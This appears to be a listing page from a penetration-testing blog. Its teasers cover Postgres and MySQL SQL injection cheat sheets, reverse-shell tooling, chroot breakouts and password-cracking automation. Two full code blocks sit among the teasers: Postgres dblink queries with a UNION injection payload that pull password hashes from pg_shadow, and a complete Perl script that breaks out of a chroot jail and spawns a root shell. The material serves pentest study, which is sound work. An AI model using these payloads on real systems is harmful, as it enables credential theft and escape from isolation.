Blog
Updated Postgres SQL Injection Cheat Sheet
I just read Nico Leidecker’s Having Fun With Postgres paper. He mostly talks about the dblink function which is sometimes enabled in Postgres – it’s a bit like MSSQL’s openrowset . There’s also some good generic advice on what to do when you get DBA access – like executing OS-level commands. I’ve updated the cheat […]
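As an added illustration of the dblink primitive the teaser refers to (this is not code from the post or from the cheat sheet it links, and nothing here is taken from Leidecker’s paper), the queries below assume a Postgres server where dblink is installed, that the `postgres` role can connect to 127.0.0.1 without a password (a “trust” line in pg_hba.conf), and an application query of the form `SELECT name FROM products WHERE id = …` with a text `name` column. All of those are assumptions for the example.

```sql
-- Added example: is dblink available to the current role?
-- Older servers register the functions directly rather than as an extension,
-- so looking in pg_proc covers both cases.
SELECT proname
FROM   pg_proc
WHERE  proname IN ('dblink', 'dblink_connect', 'dblink_exec');

-- Added example: open a second connection to the same server as another role.
-- 'host=127.0.0.1 user=postgres dbname=postgres' is an assumed connection
-- string; the call only succeeds if that role may log in without a password.
SELECT usename, passwd
FROM   dblink('host=127.0.0.1 user=postgres dbname=postgres',
              'SELECT usename, passwd FROM pg_shadow')
       AS t(usename text, passwd text);

-- Added example: the same primitive reached through a UNION-based injection
-- into the assumed application query. The part after "id = 1" is what the
-- attacker supplies; the column count and type (one text column) must match.
SELECT name FROM products WHERE id = 1
UNION
SELECT passwd FROM dblink('host=127.0.0.1 user=postgres dbname=postgres',
                          'SELECT passwd FROM pg_shadow') AS t(passwd text);
```

Check what the server actually allows before relying on this: on current Postgres releases only superusers may open a dblink connection that does not authenticate with a password (non-superusers have to be granted the separate `dblink_connect_u` function), so the escalation from an unprivileged role to `postgres` over a trust-authenticated local connection is the part most likely to be closed off.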
Scapy in PERL
Scaperl is basically scapy in PERL. Kinda useful for PERL-geeks like me who have yet to even write “Hello World” in Python.
Getting RSH on Linux to work like RSH on Solaris
If you’ve tried setting up rsh/rlogin based hacker challenges on Linux over the last few years you’ve probably noticed that Linux (I tried Redhat and Debian) doesn’t behave like Solaris. This makes either for really bad hacker challenges, or for ones involving lots of Solaris boxes. I finally found the answer recently so I thought I’d […]
Update to MySQL Injection Cheat Sheet
I just added some more notes to the MySQL Injection Cheat Sheet about command execution, file upload, privilege enumeration, casting, avoiding quotes and more. The cheat sheet is reasonably complete now.
Minor Update: Yapscan v0.7.3
I just updated yapscan . It no longer crashes when two debug flags are used for TCP scans.
Using SSH Without A TTY
I recently received a mail asking how to get SSH to work from within a reverse shell (see php-reverse-shell , php-findsock-shell and perl-reverse-shell ). I thought I’d write a brief description of the problems I’ve seen and how to work round them. I’d be very interested if anyone has any better solutions. Drop me a […]
Breaking Out of a Chroot Jail Using PERL
I had cause to want to break out of a chroot’d environment recently. It is well known that if you’re root within the chroot environment you can break out of it. I set about learning how to break out of chroot and came across an excellent description by Simes from 2002. It contains a well […]
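As an added example, not the script from the post, this is the breakout Simes’s description is known for, written in Perl. It relies on one property of chroot(2): it changes the process’s root but not its current directory. Chrooting into a subdirectory therefore leaves the working directory outside the new root, and from there repeated chdir("..") calls walk up to the real filesystem root. The example assumes the process is root inside the jail (chroot needs that privilege), that it can create a directory where it is, and that /bin/sh exists in the real root; the directory name and the loop count are arbitrary.

```perl
#!/usr/bin/perl
# Added example (not the post's own code): escape a chroot jail as root.
use strict;
use warnings;

# chroot(2) is a privileged call, so check before doing anything else.
$> == 0 or die "needs to be root inside the jail (euid $>)\n";

my $dir = "breakout-tmp";    # arbitrary name; assumed to be a writable location
mkdir $dir or -d $dir or die "mkdir $dir: $!\n";

# Keep a handle on the current directory. A few chroot() implementations
# also chdir() into the new root; chdir'ing back through this handle
# (Perl's chdir accepts a directory handle where fchdir(2) exists) undoes that.
opendir(my $cwd, ".") or die "opendir .: $!\n";

chroot($dir) or die "chroot $dir: $!\n";   # root moved, cwd now lies outside it
chdir($cwd)  or die "chdir back: $!\n";    # make sure we are still outside

# Walk up. Any count larger than the deepest plausible path works, because
# chdir("..") at the real root is a harmless no-op.
chdir("..") or die "chdir ..: $!\n" for 1 .. 1024;

chroot(".") or die "chroot .: $!\n";       # the real root is our root again
exec "/bin/sh", "-i" or die "exec /bin/sh: $!\n";
```

This only works against a plain chroot(2) jail in which the process genuinely holds root (on Linux, CAP_SYS_CHROOT); a jail that drops that capability, or that is built from mount and PID namespaces rather than chroot alone, does not fall to it.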
A Quick Look at Windows 2008 Server Beta
I recently installed Windows 2008 Beta in a VMWare Machine to see what Microsoft have in store for us. Being a pentester, I mainly looked at the default security settings, so don’t go expecting a review of the shiny new GUI…
Yaptest Update: v0.0.6
This release of yaptest adds support for more tools, fixes some bugs and has partial support for keeping track of which users belong to which groups on the systems you’ve compromised. The full list of changes is shown below. The yaptest installation page has links to the newly supported tools if you want to download […]
Yaptest Update: v0.0.5
Yaptest is now also able to call John the Ripper to crack NTLM hashes (v0.0.4 only supported LANMAN hashes). It’s also possible to specify your own command line for calling John The Ripper (in case you want to run the MPI version of John under mpiexec for example). For those particularly troublesome LANMAN hashes, yaptest is […]